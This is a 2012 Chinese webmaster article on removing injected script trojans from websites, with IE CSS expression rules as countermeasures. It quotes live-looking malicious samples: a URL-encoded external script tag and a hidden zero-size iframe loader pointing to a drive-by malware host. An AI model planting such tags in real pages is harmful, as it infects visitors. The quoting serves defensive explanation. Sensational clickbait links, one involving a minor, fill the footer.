当前位置:w88优德官网网文章中心网站设计网页设计 → 网站被挂马的解决方案

网站被挂马的解决方案

减小字体 增大字体 作者:admin  来源:www.hack50.com  发布时间:2012-8-21 7:25:05

 挂马最近非常频繁,挂毒很赚哦这谁都知道,做为站长我们没有能力去阻止他人挂马,但至少要保证自己不被挂马吧?这段时间,我渐渐感到压力,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。想了想,还是要抽空来,在流行挂<script>木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了,或写进你现成的js文件里,找起来很麻烦: 
注意,以下地址含有木马,请不要轻易访问:

<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>

汗死,一连插入了N个一样的<script>标记。偶的电脑什么补丁都打了,直接访问这个http://%76%63%63%64%2E%63%6E(或直接使用迅雷下载),额~ 现形了:
document.write("<div style='display:none'>")
document.write("<iframe src= http://www.qqqm8.net /b1.htm?id=017 width=0 height=0></iframe>")
document.write("</div>")
又用迅雷下载http://a.b.com/b1.htm这个文件,一看,乱七八糟的JS编码,汗,不过找到了一个类似QQ号的数字,直接加加看,汗,然后是专业提供网马的组织,哎。

var Kfqq, Qqs="******"; qwfgsg="LLLL\\XXXXXLD"; Kfqq = Qqs;
(...略)(下面还有N个统计的JS代码)
针对上面的情况,办法想到了。稍微分析就得出了答案。大家来看看,<script>木马的特点是什么:
<script src=http://%76%63%63%64%2E%63%6E></script>

对了,script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是其他<object>代码,不管这么多,来多少杀多少。

来跟我写CSS,一一搞定它们,我写了5种不同的方案,大家来测试一下哈:

 
网站被挂马解决方案一:

iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}
原理:将<script>标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,如果是,则页面内容清空并写出“木马被成功隔离!”。反之正常显示。
缺点:访客无法看到被感染了<script>木马的页面

网站被挂马解决方案二:

iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}

原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写进网页,也就不会再执行,这样就做到了既然挂上了网页木马也无法运行,当然这只能算是暂时的解决办法,真正的解决办法还得靠网站程序和服务器的安全来保证,代码不是万能的,网马有多种形式,好了不多说了,给别人和自己留条路,希望能帮的到大家!

本文作者:

本文引用网址:
在下列搜索引擎中搜索“网站被挂马的解决方案”的相关信息:
谷歌搜索 百度搜索 雅虎搜索 搜狗搜索 搜搜搜索 必应搜索 有道搜索
你可能还喜欢以下文章
  • 1干露露拍人体艺术照疯传 干露露...
  • 2韩国性爱视频曝光 盘点韩国演艺...
  • 3有钱人都开什么车?系数国内IT...
  • 4林晨钰爆奶门全套35P照片 人人...
  • 5干露露第二波艳照 干露露裸照全...
  • 1百度联盟:哪些做法会被认为是...
  • 2Discuz!不能正常发送邮件-DISC...
  • 3织梦CMS读取频道信息失败 无法...
  • 4如何搭建第一个网站?做网站有...
  • 5如何做SEO才能让百度喜欢?
  • 1粉小狞是谁?粉小狞微博晒粉色...
  • 215岁初三女生求包养 聊天记录曝...
  • 3合肥艳照门事件 合肥艳照门全套...
  • 4越南版瑶瑶阮金红最新私照流出...
  • 5《蜜桃成熟时33D》全裸艳照曝光...
  • 1如何做服务器安全维护?有哪些...
  • 2Xen和虚拟化技术学习指南
  • 3Windows Server 2003 安全性指...
  • 4用Webmin和VSFTP搭建FTP服务器...
  • 5菜鸟入门之centos的文件夹权限...
  • 赞助商广告

    图片文章导读